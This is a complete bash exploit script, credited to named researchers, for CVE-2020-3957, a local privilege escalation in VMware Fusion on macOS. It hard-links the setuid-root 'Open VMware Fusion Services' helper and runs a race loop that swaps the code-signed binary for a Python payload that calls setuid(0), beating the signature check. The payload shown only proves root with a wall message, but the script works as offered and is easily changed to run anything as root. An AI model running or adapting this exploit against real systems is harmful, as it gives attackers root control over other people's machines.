#!/bin/bash
#
# Exploit Title: VMware Fusion Elevation Of Privilege - TOCTOU - code signature bypass
# Date: 2020-06-02
# Exploit Author: Rich Mirch of Critical Start, TeamARES
# Discovery: Jeff Ball
# CVE: CVE-2020-3957
#

SWAPPER=$(mktemp)
WOOT=$(mktemp) # malicous code
chmod 755 ${SWAPPER?} ${WOOT?}

# Create staged environment
STAGE=$(mktemp -d)
echo "Stage=$STAGE"
cd ${STAGE?}

mkdir -p Contents/Library/services
cd Contents/Library/services

# Open VMware Fusion Services is setuid root
ln "/Applications/VMware Fusion.app/Contents/Library/services/Open VMware Fusion Services"

# VMware Fusion Services is called by Open VMware Fusion Services but verifies
# the code signature before executing.
ln "/Applications/VMware Fusion.app/Contents/Library/services/VMware Fusion Services" "VMware Fusion Services.orig"

# brute force swapping the real binary with a malicious file
cat >${SWAPPER?}<<EOF
#!/bin/bash
while true
do
  ln -f 'VMware Fusion Services.orig' 'VMware Fusion Services'
  ln -f ${WOOT?} 'VMware Fusion Services'
done
EOF

# malicious file to be executed as root
cat >${WOOT?}<<EOF
#!/usr/bin/python
import os
os.setuid(0)
os.system("echo WOOT: \$(/usr/bin/id)|/usr/bin/wall")
EOF

${SWAPPER?} &
SWAPPER_PID=$!

trap "kill -9 ${SWAPPER_PID?};rm -f ${SWAPPER?} ${WOOT?};exit" INT

echo "CTRL+C when wall message is received"
while true
do
  ./Open\ VMware\ Fusion\ Services >/dev/null 2>/dev/null
done

echo stage=${STAGE?}
